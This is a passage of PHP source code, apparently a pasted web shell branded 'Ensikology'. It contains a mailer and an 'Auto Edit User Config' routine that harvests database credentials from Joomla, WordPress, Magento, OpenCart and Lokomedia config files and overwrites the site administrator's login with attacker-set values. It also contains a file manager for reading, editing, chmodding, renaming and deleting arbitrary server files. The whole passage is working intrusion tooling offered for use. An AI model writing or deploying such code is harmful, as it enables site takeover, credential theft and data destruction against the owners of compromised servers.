  3726. echo "<h1>Mailer</h1>
  3727. <form method='post'>
  3728. <textarea name='content' value='Patch your security !' placeholder='Patch your security !'></textarea><br>
  3729. Subject :
  3730. <input type='text' name='subject' value='Website Kamu'><br>
  3731. To : <input type='text' name='to' value='support@ensikology.com'><br>From : <input type='text' name='from' value='ensikology@gmail.com'><br><input type='submit' name='send' value='Send'><br><br>";
  3732. echo $out;
  3733. }elseif($_GET['EnsikologyScience'] == 'edituser') {
  3734. if($_POST['hajar']) {
  3735. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  3736. echo "username atau password harus lebih dari 6 karakter";
  3737. } else {
  3738. $user_baru = $_POST['user_baru'];
  3739. $pass_baru = md5($_POST['pass_baru']);
  3740. $conf = $_POST['config_dir'];
  3741. $scan_conf = scandir($conf);
  3742. foreach($scan_conf as $file_conf) {
  3743. if(!is_file("$conf/$file_conf")) continue;
  3744. $config = file_get_contents("$conf/$file_conf");
  3745. if(preg_match("/JConfig|joomla/",$config)) {
  3746. $dbhost = ambilkata($config,"host = '","'");
  3747. $dbuser = ambilkata($config,"user = '","'");
  3748. $dbpass = ambilkata($config,"password = '","'");
  3749. $dbname = ambilkata($config,"db = '","'");
  3750. $dbprefix = ambilkata($config,"dbprefix = '","'");
  3751. $prefix = $dbprefix."users";
  3752. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3753. $db = mysql_select_db($dbname);
  3754. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3755. $result = mysql_fetch_array($q);
  3756. $id = $result['id'];
  3757. $site = ambilkata($config,"sitename = '","'");
  3758. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  3759. echo "Config => ".$file_conf."<br>";
  3760. echo "CMS => Joomla<br>";
  3761. if($site == '') {
  3762. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  3763. } else {
  3764. echo "Sitename => $site<br>";
  3765. }
  3766. if(!$update OR !$conn OR !$db) {
  3767. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3768. } else {
  3769. echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3770. }
  3771. mysql_close($conn);
  3772. } elseif(preg_match("/WordPress/",$config)) {
  3773. $dbhost = ambilkata($config,"DB_HOST', '","'");
  3774. $dbuser = ambilkata($config,"DB_USER', '","'");
  3775. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3776. $dbname = ambilkata($config,"DB_NAME', '","'");
  3777. $dbprefix = ambilkata($config,"table_prefix = '","'");
  3778. $prefix = $dbprefix."users";
  3779. $option = $dbprefix."options";
  3780. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3781. $db = mysql_select_db($dbname);
  3782. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3783. $result = mysql_fetch_array($q);
  3784. $id = $result[ID];
  3785. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3786. $result2 = mysql_fetch_array($q2);
  3787. $target = $result2[option_value];
  3788. if($target == '') {
  3789. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3790. } else {
  3791. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  3792. }
  3793. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  3794. echo "Config => ".$file_conf."<br>";
  3795. echo "CMS => Wordpress<br>";
  3796. echo $url_target;
  3797. if(!$update OR !$conn OR !$db) {
  3798. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3799. } else {
  3800. echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3801. }
  3802. mysql_close($conn);
  3803. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  3804. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  3805. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  3806. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  3807. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  3808. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  3809. $prefix = $dbprefix."admin_user";
  3810. $option = $dbprefix."core_config_data";
  3811. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3812. $db = mysql_select_db($dbname);
  3813. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  3814. $result = mysql_fetch_array($q);
  3815. $id = $result[user_id];
  3816. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  3817. $result2 = mysql_fetch_array($q2);
  3818. $target = $result2[value];
  3819. if($target == '') {
  3820. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3821. } else {
  3822. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  3823. }
  3824. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  3825. echo "Config => ".$file_conf."<br>";
  3826. echo "CMS => Magento<br>";
  3827. echo $url_target;
  3828. if(!$update OR !$conn OR !$db) {
  3829. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3830. } else {
  3831. echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3832. }
  3833. mysql_close($conn);
  3834. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  3835. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  3836. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  3837. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  3838. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  3839. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  3840. $prefix = $dbprefix."user";
  3841. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3842. $db = mysql_select_db($dbname);
  3843. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  3844. $result = mysql_fetch_array($q);
  3845. $id = $result[user_id];
  3846. $target = ambilkata($config,"HTTP_SERVER', '","'");
  3847. if($target == '') {
  3848. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3849. } else {
  3850. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  3851. }
  3852. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  3853. echo "Config => ".$file_conf."<br>";
  3854. echo "CMS => OpenCart<br>";
  3855. echo $url_target;
  3856. if(!$update OR !$conn OR !$db) {
  3857. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3858. } else {
  3859. echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3860. }
  3861. mysql_close($conn);
  3862. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  3863. $dbhost = ambilkata($config,'server = "','"');
  3864. $dbuser = ambilkata($config,'username = "','"');
  3865. $dbpass = ambilkata($config,'password = "','"');
  3866. $dbname = ambilkata($config,'database = "','"');
  3867. $prefix = "users";
  3868. $option = "identitas";
  3869. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3870. $db = mysql_select_db($dbname);
  3871. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  3872. $result = mysql_fetch_array($q);
  3873. $target = $result[alamat_website];
  3874. if($target == '') {
  3875. $target2 = $result[url];
  3876. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3877. if($target2 == '') {
  3878. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3879. } else {
  3880. $cek_login3 = file_get_contents("$target2/adminweb/");
  3881. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  3882. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  3883. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  3884. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  3885. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  3886. } else {
  3887. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  3888. }
  3889. }
  3890. } else {
  3891. $cek_login = file_get_contents("$target/adminweb/");
  3892. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  3893. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  3894. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  3895. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  3896. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  3897. } else {
  3898. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  3899. }
  3900. }
  3901. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  3902. echo "Config => ".$file_conf."<br>";
  3903. echo "CMS => Lokomedia<br>";
  3904. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  3905. echo $url_target2;
  3906. } else {
  3907. echo $url_target;
  3908. }
  3909. if(!$update OR !$conn OR !$db) {
  3910. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3911. } else {
  3912. echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3913. }
  3914. mysql_close($conn);
  3915. }
  3916. }
  3917. }
  3918. } else {
  3919. echo "<center>
  3920. <h1>Auto Edit User Config</h1>
  3921. <form method='post'>
  3922. DIR Config: <br>
  3923. <input type='text' size='50' name='config_dir' value='$path'><br><br>
  3924. Set User & Pass: <br>
  3925. <input type='text' name='user_baru' value='Ensikology' placeholder='user_baru'><br>
  3926. <input type='text' name='pass_baru' value='RaBiitch' placeholder='pass_baru'><br>
  3927. <input type='submit' name='hajar' value='Edit' style='width: 215px;'>
  3928. </form>";
  3929. }
  3930. }elseif(isset($_GET['filesrc'])){
  3931. echo "<tr><td>Current File : ";
  3932. echo $_GET['filesrc'];
  3933. echo '</tr></td></table><br/>';
  3934. echo('<textarea cols="80" rows="20" readonly>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>');
  3935. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  3936. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  3937. if($_POST['opt'] == 'chmod'){
  3938. if(isset($_POST['perm'])){
  3939. if(chmod($_POST['path'],$_POST['perm'])){
  3940. echo '<font color="green">Success !</font><br/>';
  3941. }else{
  3942. echo '<font color="red">Denied !</font><br />';
  3943. }
  3944. }
  3945. echo '<form method="POST">
  3946. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  3947. <input type="hidden" name="path" value="'.$_POST['path'].'">
  3948. <input type="hidden" name="opt" value="chmod">
  3949. <input type="submit" value="Go" />
  3950. </form>';
  3951. }
  3952. elseif($_POST['opt'] == 'rename'){
  3953. if(isset($_POST['newname'])){
  3954. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  3955. echo '<font color="green">Success !</font><br/>';
  3956. }else{
  3957. echo '<font color="red">Denied !</font><br />';
  3958. }
  3959. $_POST['name'] = $_POST['newname'];
  3960. }
  3961. echo '<form method="POST">
  3962. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  3963. <input type="hidden" name="path" value="'.$_POST['path'].'">
  3964. <input type="hidden" name="opt" value="rename">
  3965. <input type="submit" value="Go" />
  3966. </form>';
  3967. }elseif($_POST['opt'] == 'edit'){
  3968. if(isset($_POST['src'])){
  3969. $fp = fopen($_POST['path'],'w');
  3970. if(fwrite($fp,$_POST['src'])){
  3971. echo '<font color="green">Success !</font><br/>';
  3972. }else{
  3973. echo '<font color="red">Denied !</font><br/>';
  3974. }
  3975. fclose($fp);
  3976. }
  3977. echo '<form method="POST">
  3978. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  3979. <input type="hidden" name="path" value="'.$_POST['path'].'">
  3980. <input type="hidden" name="opt" value="edit">
  3981. <input type="submit" value="Save" />
  3982. </form>';
  3983. }
  3984. echo '</center>';
  3985. }else{
  3986. echo '</table><br/><center>';
  3987. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  3988. if($_POST['type'] == 'dir'){
  3989. if(rmdir($_POST['path'])){
  3990. echo '<font color="green">Success !</font><br/>';
  3991. }else{
  3992. echo '<font color="red">Denied ! </font><br/>';
  3993. }
  3994. }elseif($_POST['type'] == 'file'){
  3995. if(unlink($_POST['path'])){
  3996. echo '<font color="green">Success</font><br/>';
  3997. }else{
  3998. echo '<font color="red">Denied</font><br/>';
  3999. }
  4000. }
  4001. }
  4002. echo '</center>';
  4003. $scandir = scandir($path);
  4004. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  4005. <tr class="first">
  4006. <td><center>Name</center></td>
  4007. <td><center>Size</center></td>
  4008. <td><center>Permission</center></td>
  4009. <td><center>Action</center></td>
  4010. </tr>';
  4011.  
  4012. foreach($scandir as $dir){
  4013. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  4014. echo '<tr>
  4015. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
  4016. <td><center>--</center></td>
  4017. <td><center>';
  4018. if(is_writable($path.'/'.$dir)) echo '<font color="green">';
  4019. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
  4020. echo perms($path.'/'.$dir);
  4021. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
  4022.  
  4023. echo '</center></td>
  4024. <td><center><form method="POST" action="?option&path='.$path.'">
  4025. <select name="opt">
  4026. <option value="">Select</option>
  4027. <option value="delete">Delete</option>
  4028. <option value="chmod">Chmod</option>
  4029. <option value="rename">Rename</option>
  4030. </select>
  4031. <input type="hidden" name="type" value="dir">
  4032. <input type="hidden" name="name" value="'.$dir.'">
  4033. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
  4034. <input type="submit" value=">">
  4035. </form></center></td>
  4036. </tr>';
  4037. }
  4038. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  4039. foreach($scandir as $file){
  4040. if(!is_file($path.'/'.$file)) continue;
  4041. $size = filesize($path.'/'.$file)/1024;
  4042. $size = round($size,3);
  4043. if($size >= 1024){
  4044. $size = round($size/1024,2).' MB';
  4045. }else{
  4046. $size = $size.' KB';
  4047. }
  4048.  
  4049. echo '<tr>
  4050. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
  4051. <td><center>'.$size.'</center></td>
  4052. <td><center>';
  4053. if(is_writable($path.'/'.$file)) echo '<font color="green">';
  4054. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
  4055. echo perms($path.'/'.$file);
  4056. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
  4057. echo '</center></td>
  4058. <td><center><form method="POST" action="?option&path='.$path.'">
  4059. <select name="opt">
  4060. <option value="">Select</option>
  4061. <option value="delete">Delete</option>
  4062. <option value="chmod">Chmod</option>
  4063. <option value="rename">Rename</option>
  4064. <option value="edit">Edit</option>
  4065. </select>
  4066. <input type="hidden" name="type" value="file">
  4067. <input type="hidden" name="name" value="'.$file.'">
  4068. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
  4069. <input type="submit" value=">">
  4070. </form></center></td>
  4071. </tr>';
  4072. }
  4073. echo '</table>
  4074. </div></div>';
  4075. }
  4076. echo '<center><br/>&copy Copyright '.date("Y").' <a href="https://ensikology.blogspot.com" title="Kreativitas adalah kunci kesuksesan">'.$_COPY.'</a> All Rights Reserved</center>
  4077. </body>
  4078. </html>';
  4079. ?>
Add Comment
Please, Sign In to add comment